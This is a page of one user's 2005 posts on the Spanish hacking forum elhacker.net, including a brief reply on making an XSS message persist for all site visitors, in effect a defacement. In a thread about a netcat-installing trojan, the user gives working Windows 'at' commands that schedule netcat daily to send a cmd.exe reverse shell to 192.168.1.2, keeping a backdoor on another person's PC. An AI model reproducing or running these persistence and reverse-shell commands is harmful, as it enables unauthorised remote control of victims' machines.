elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 4 [5]
41  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Webs Prohibidas en el TOP en: 29 Mayo 2005, 05:01 am
no te preocupes, ahora paso al quinto lugar... ;D ;D ;D ;D

Salu2
42  Seguridad Informática / Nivel Web / Re: ayuda con xss en: 11 Mayo 2005, 23:35 pm
Bueno pues mi duda es la siguiente, descubri un cross site script (xss) y quisiera saber como dejar el mensaje en la web porque solo aparece en la mia y eso si no borro el cache, osea, como le hago para que todos los usuarios que entren a la web vean el mensaje, no quiero obtener las cookies, solo quiero dejar el mensaje, porfavor ayudenme que es muy muy necesario, muchas gracias  :)

lee algo mas sobre XSS, y si tu intencion es dejar un mensajito, de alguna forma quieres hacer un deface para q los vean los user de es web... ;)

salu2
43  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 25 Abril 2005, 00:42 am
enaz!
lo que podemos hacer aqui es dejarlo programado para que se ejecute diariamente a determinada hora que nosotros ya tengamos previamente nuestro netcat a la espera de la shell, para esto vamos a utilizar el comando AT , la sintaxis seria la siguiente:

Código: at <dia> <hora> "comando"

por lo tanto quedaria asi:

Código: at /every:1 6:00p ""nc -d -e cmd.exe 192.168.1.2 6000""

o tambien:

Código: at /every:1 6:00p ""nc 192.168.1.2 80 | cmd.exe | nc 192.168.1.2 25""

de esta manera ejecutara el netcat diariamente a las 6:00 p.m. tomando en cuenta de que el nc ya se encuentre en system32, en caso contrario van a tener que poner la ruta del netcat.para verificar que se haya agregado la tarea solo tecleen:
Código: at

Salu2
Páginas: 1 2 3 4 [5]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines